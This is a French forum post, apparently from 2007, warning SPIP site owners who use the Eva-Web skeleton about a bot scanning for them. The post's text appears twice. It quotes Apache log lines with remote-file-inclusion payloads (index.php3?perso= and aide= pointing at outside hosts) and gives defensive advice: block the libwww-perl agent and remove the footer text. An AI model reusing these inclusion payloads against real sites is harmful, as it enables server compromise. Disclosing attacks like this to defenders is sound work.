Bonjour
Un robot d'origine inconnue scanne actuellement les sites spip qui fonctionnent avec le squelette eva.
Ce robot est précédé d'une requete google ou autre moteur de recherche (mozbot par ex) sur
"et utilise le squelette " qui correspond au footer par défaut des dernières version de Eva web
Quelque temps après, vous verrez fleurir des requetes (jusqu'à 5 fois le traffic normal du site) du type
évidemment, c'est pas bon, ça semble télécharger ou activer un script de daube qui fait je ne sais pas quoi de bon à distance en se référrant de votre domaine, ça sent clairement le pâté !
J'avais déjà signalé ce problème ici il y a quelques jours
https://www.webrankinfo.com/forum/t/logs-bizarre-libwww-perl-sur-gp60ovh-hier-et-avant-hier.76007/
cela s'était calmé depuis, mais j'ai renoté un regain d'activité aujourd'hui et cela commence à vraiment me faire ch...!
J'ai préfére par mesure de sécurité interdire simplement l'accès du site en question à toute requète de la part de useragent=libwww-perl; en attendant d'en savoir un peu plus. D'un autre côté, cela m'emm..... au plus haut point, et dans ces conditions, je sais être méchant, à bon entendeur salut
J'invite donc les utilisateurs de spip+Eva WEB à la plus grande prudence et à regarder leurs logs d'un peu plus près. Dans le doute, faites en plus disparaitre la mention "et utilise le squelette " du footer
(c'est entre les lignes 42 et 52 du fichier /squelette/inc_pied.html)
tant pis pour le copyright, l'équippe développeurs de spip comprendra qu'il s'agit d'un trou de sécurité.
Bon, j'éspère ne pas en avoir trop oublié, faites passer le message.
Un robot d'origine inconnue scanne actuellement les sites spip qui fonctionnent avec le squelette eva.
Ce robot est précédé d'une requete google ou autre moteur de recherche (mozbot par ex) sur
"et utilise le squelette " qui correspond au footer par défaut des dernières version de Eva web
ça c'est le log apache de la recherche de faille sur mozbotXX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:34:05 +0200] "GET /favicon.ico HTTP/1.1" 404 291 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
XX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:36:34 +0200] "GET /spip.php?rubrique3 HTTP/1.1" 200 6006 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
Quelque temps après, vous verrez fleurir des requetes (jusqu'à 5 fois le traffic normal du site) du type
ou encore du genreYYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?perso=http://ulil.t35.com/2? HTTP/1.1" 200 19641 "-" "libwww-perl/5.65"
YYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?aide=http://ulil.t35.com/2? HTTP/1.1" 200 19640 "-" "libwww-perl/5.65"
(enfin celui là j'avais déjà bloqué libwww-perl -> erreur 403;voir plus bas)bublue.dX www;monsite.com - [02/Jul/2007:16:07:40 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 298 "-" "libwww-perl/5.69"
bublue.dX www;monsite.com - [02/Jul/2007:16:12:48 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 294 "-" "libwww-perl/5.69"
évidemment, c'est pas bon, ça semble télécharger ou activer un script de daube qui fait je ne sais pas quoi de bon à distance en se référrant de votre domaine, ça sent clairement le pâté !
J'avais déjà signalé ce problème ici il y a quelques jours
https://www.webrankinfo.com/forum/t/logs-bizarre-libwww-perl-sur-gp60ovh-hier-et-avant-hier.76007/
cela s'était calmé depuis, mais j'ai renoté un regain d'activité aujourd'hui et cela commence à vraiment me faire ch...!
J'ai préfére par mesure de sécurité interdire simplement l'accès du site en question à toute requète de la part de useragent=libwww-perl; en attendant d'en savoir un peu plus. D'un autre côté, cela m'emm..... au plus haut point, et dans ces conditions, je sais être méchant, à bon entendeur salut
J'invite donc les utilisateurs de spip+Eva WEB à la plus grande prudence et à regarder leurs logs d'un peu plus près. Dans le doute, faites en plus disparaitre la mention "et utilise le squelette " du footer
(c'est entre les lignes 42 et 52 du fichier /squelette/inc_pied.html)
Code:
<p>
<:copyright_spip:>
<a href="http://www.spip.net/fr">SPIP #SPIP_VERSION</a>
<:copyright_eva:>
<a href="http://spip-edu.edres74.net/eva/"><:version_eva:></a>
</p>
<p>
<BOUCLE_maj(RUBRIQUES){age>=0}{par date}{inverse}{0,1}>
Dernière mise à jour : <b>[(#DATE|nom_jour)] [(#DATE|affdate)]</b>
</BOUCLE_maj>
</p>
Bon, j'éspère ne pas en avoir trop oublié, faites passer le message.